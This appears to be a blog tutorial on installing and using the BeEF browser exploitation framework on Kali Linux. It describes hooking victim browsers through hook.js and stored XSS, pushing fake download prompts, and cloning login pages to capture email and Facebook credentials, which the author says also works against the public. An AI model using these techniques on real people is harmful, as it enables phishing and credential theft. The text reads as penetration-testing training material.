The Browser Exploitation Framework (BeEF) is a tool used mostly for honeypot and social engineering under the penetration testing. It uses the weakness of web browser security. Victim connects to BeEF server and will be under attack for various scenarios. The hooked web browser of a victim now is exploitable by BeEF server as long as victim is online. Attacker can execute the commands over BeEF panel. This client-side attack tool started in 2006 as open-source.
ntallation on Kali
apt install beef
apt install beef-xss
apt install beef-xss --fix-missing (if error occurs)
Type beef-xss to start
You’ll automatically have the login page where you can enter your created password during installation.
When you enter your creds with default username “beef”, you‘ll be directed to BeEF panel.
BeEF provides a demo servers to execute the commands for training, you may use either first or second:
Here it’s, it seems hooked, let’s check on Network Map.
There are lots of details about target such as browser info, plugins, OS, version…
The main mentality is that we need the victim visit the vuln-web-browser (hook.js) under JavaScript. BeEF already obtains a webpage with executable payloads on our localhost in order to execute them.
Let’s execute basic samples…
We can execute a fake notification bar that may contain embedded exploitable plugin URL.
It pops up on victim’s screen.
When victim click on it to download, we have the result whether payload is being downloaded.
Another command is for a good phishing method to capture the email creds.
Victim may have the original login page, and when s/he enter her/his creds.
We immediately receive the result.
Same for other social media, which can be modified associated with original design, and we have successfully got the user’s Facebook creds.
Or we can execute the prompt text on victim’s screen to get sensible data, or want to target to click/type intended link.
This training has been practiced on internal lab with offline/demo browser, but it is one of PoC, can be performed and practiced on public too under a static IP or domain. So, BeEF’s hooking script can abuse the vuln-stored XSS injection or Cross-Site Scripting which are still relevant attack vector.
Thanks for reading.
Read on Medium Beef; yes it is, something edible, but not meat
Comments